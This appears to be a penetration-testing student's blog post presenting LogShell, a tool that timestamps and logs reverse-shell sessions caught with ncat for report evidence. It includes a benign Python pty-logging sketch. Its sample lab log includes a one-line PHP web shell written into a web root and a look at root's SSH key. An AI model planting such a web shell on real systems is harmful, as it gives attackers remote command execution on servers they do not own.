I’ve recently started the “Documentation and Reporting” module on the Hack The Box Academy as part of my prep for the CPTS exam, which I should be taking soon.
I’ve always understood the importance of logging the commands executed on a target and documenting system changes during a penetration test, but the authors of this module really drove the point home with their horror stories.
Facing the wrath of an angry IT guy accusing me of wreaking havoc in critical infrastructure is definitely not on my agenda. So, I’d better ensure my commands are logged as an alibi.
The module suggested a TMUX logging plugin, but I’ve always found TMUX to be janky, with keybindings that seem to have been made by aliens with no concept of human hands or convention. After giving it another shot and spending some time tweaking and troubleshooting, I decided it just wasn’t for me. So, I started looking for other options.
Since I couldn’t find an exact match for what I needed, I figured I’d spend the rest of the afternoon coding one myself. I named it LogShell (a tad too close to Log4Shell, but oh well).
My goal was to create a program that I could chain alongside netcat and rlwrap to maintain the usual experience but with the bonus of logging everything whenever I wanted.
# Catching a reverse shell exactly as I would before but with logging enabled.
$ logshell rlwrap ncat -lnvp 1337
Once I’ve got a shell, every command and its output will be logged with timestamps in a file named after the target’s IP address.
┌──(user㉿kali)-[~]
└─$ cat ~/Logs/127.0.0.1.log
=============================================================
Shell session initiated at: 2024-05-30 19:48:41
=============================================================
(19:48:47) $ whoami
(19:48:47) user
(19:49:20) $ ip a
(19:49:20) eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
(19:49:20) inet 192.168.1.10 netmask 255.255.255.0 broadcast 192.168.1.255
(19:49:20) inet6 fe80::f816:3eff:fe21:57cf prefixlen 64 scopeid 0x20<link>
(19:49:20) ether f8:16:3e:21:57:cf txqueuelen 1000 (Ethernet)
(19:49:20) RX packets 150234 bytes 20345763 (19.4 MiB)
(19:49:20) RX errors 0 dropped 0 overruns 0 frame 0
(19:49:20) TX packets 134567 bytes 18320456 (17.4 MiB)
(19:49:20) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
(19:49:50) $ echo '<?=`$_GET[1]`?>' > /var/www/html/web-shell.php
(19:51:03) exit
=============================================================
Shell session initiated at: 2024-05-30 19:53:50
=============================================================
(19:54:01) # id
(19:54:01) uid=0(root) gid=0(root) groups=0(root)
(19:56:45) # ls -la .ssh/id_rsa
(19:56:45) -rw-------. 1 root root 0 Nov 20 2023 .ssh/id_rsa
(19:57:44) # cat flag.txt
(19:57:44) FLAG{y0u_607_m3!}
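To make the mechanism concrete, here is a hypothetical minimal wrapper written for this post. It is not LogShell and was not taken from its repository; it only sketches the approach the tool takes: run the listener inside a pseudo-terminal, relay keystrokes through untouched, and timestamp every line that reaches the screen into ~/Logs/<ip>.log, in the same layout as the listing above. The file name ptylog.py, the names LineStamper, relay and open_log, and the assumption that the listener is ncat with -v (so it prints its "Ncat: Connection from A.B.C.D:port." banner, which is how the target IP is learned) are all mine.

```python
"""Hypothetical logging wrapper in the spirit of LogShell (not the author's code).
Usage: python3 ptylog.py rlwrap ncat -lnvp 1337
The listener runs in a pseudo-terminal; everything that reaches the screen (typed
commands as echoed, plus the remote output) is timestamped per line and appended
to ~/Logs/<peer-ip>.log, the IP taken from ncat's "Connection from" banner.
"""
import datetime
import os
import pty
import re
import select
import sys
import termios
import tty

LOG_DIR = os.path.expanduser("~/Logs")
PEER_RE = re.compile(rb"Connection from (\d{1,3}(?:\.\d{1,3}){3})")
ANSI_RE = re.compile(rb"\x1b\[[0-9;?]*[ -/]*[@-~]|\x1b[=>]|\x07")  # CSI, keypad mode, BEL

def extract_peer_ip(data: bytes):
    """Return the client IP from an ncat connection banner, or None."""
    m = PEER_RE.search(data)
    return m.group(1).decode() if m else None

def session_banner(now: datetime.datetime) -> str:
    bar = "=" * 61
    return f"{bar}\nShell session initiated at: {now:%Y-%m-%d %H:%M:%S}\n{bar}\n"

class LineStamper:
    """Turn a raw byte stream into timestamped one-per-line records: partial lines
    are buffered until their newline arrives, CR/LF variants and ANSI escapes
    (rlwrap, coloured prompts) are stripped so the log stays greppable."""

    def __init__(self):
        self.buf = b""

    def feed(self, data: bytes, now: datetime.datetime) -> list:
        self.buf += data.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
        *lines, self.buf = self.buf.split(b"\n")
        records = []
        for raw in lines:
            text = ANSI_RE.sub(b"", raw).decode("utf-8", "replace").rstrip()
            if text:
                records.append(f"({now:%H:%M:%S}) {text}\n")
        return records

def open_log(name: str):
    os.makedirs(LOG_DIR, exist_ok=True)
    f = open(os.path.join(LOG_DIR, f"{name}.log"), "a", encoding="utf-8")
    f.write(session_banner(datetime.datetime.now()))
    return f

def relay(argv: list) -> int:
    """Run argv under a pty, mirror it to this terminal, and log every line."""
    pid, master = pty.fork()
    if pid == 0:                                   # child: become the listener
        os.execvp(argv[0], argv)
    stamper, log, pending = LineStamper(), None, []
    saved = termios.tcgetattr(sys.stdin)
    tty.setraw(sys.stdin.fileno())                 # keystrokes pass through untouched
    try:
        while True:
            ready, _, _ = select.select([sys.stdin, master], [], [])
            if sys.stdin in ready:
                keys = os.read(sys.stdin.fileno(), 4096)
                if not keys:
                    break
                os.write(master, keys)
            if master in ready:
                try:
                    data = os.read(master, 4096)
                except OSError:                    # pty closed: listener exited
                    break
                if not data:
                    break
                os.write(sys.stdout.fileno(), data)
                records = stamper.feed(data, datetime.datetime.now())
                if log is None and (peer := extract_peer_ip(data)):
                    log = open_log(peer)           # now we know who connected
                    log.writelines(pending)        # keep the pre-connect lines too
                    pending = []
                if log is None:
                    pending += records
                else:
                    log.writelines(records)
                    log.flush()
    finally:
        termios.tcsetattr(sys.stdin, termios.TCSADRAIN, saved)
        if log is None and pending:                # no ncat banner seen: fall back
            log = open_log("unknown")
            log.writelines(pending)
        if log:
            log.close()
    _, status = os.waitpid(pid, 0)
    return os.waitstatus_to_exitcode(status)

if __name__ == "__main__":
    sys.exit(relay(sys.argv[1:]) if len(sys.argv) > 1 else 2)
```

Two things worth noting about this design. The log records what you actually saw, including the command lines rlwrap echoes back, so any prompt such as the "$ " or "# " in the listing above comes from the remote shell itself, not from the wrapper. And because the remote's output is written verbatim, credentials, keys and flags the target prints end up in ~/Logs alongside your commands; the directory is evidence for the report, so keep it out of shared locations and never edit the files after the fact.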
There is definitely room for improvement, so I might play around with it some more and add more features. But it’s already serviceable and will hopefully protect me from enraged network admins.
You can get LogShell on my GitHub.